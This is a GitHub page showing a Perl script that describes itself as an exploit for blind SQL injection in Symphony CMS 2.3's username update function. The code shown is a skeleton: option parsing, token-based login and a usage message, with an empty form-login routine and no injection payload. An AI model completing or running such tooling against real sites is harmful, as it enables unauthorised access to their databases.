-
-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy pathsymphony-cms-username-sqli.pl
executable file
·43 lines (37 loc) · 1.25 KB
/
symphony-cms-username-sqli.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/usr/bin/perl
# Exploit blind sql injection in username update function of symphony-cms 2.3
# Written by Wireghoul - http://www.justanotherhacker.com
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;
use Data::Dumper;
my $url = 'http://localhost/vvv/symphony';
my %options = ();
GetOptions(\%options, 'token=s', 'session=s', 'username=s','password=s');
my $target = $ARGV[0];
&usage() unless ( exists($options{'token'}) || exists($options{'session'}) ||
( exists($options{'username'}) && exists($options{'password'}) ));
&usage() unless $target;
my $lwp = LWP::UserAgent->new();
if ($options{'token'}) {
&token_auth($options{'token'});
} elsif ($options{'username'}) { #already checked if password was set
&form_auth();
} else {
print "Exploiting active session: $options{'session'}\n";
}
sub token_auth {
my $token = shift;
print "Attempting authentication using token via $target/login/$token\n";
$lwp->get("$target/login/$token");
return;
}
sub form_auth {
}
sub usage {
print "$0 <options> baseurl\nOptions are:\n";
print "\t--token\t\t- auth token for login\n\t--session\t- session id to use\n";
print "\t--username\t- username for login form\n\t--password\t- password to use with login form\n";
exit;
}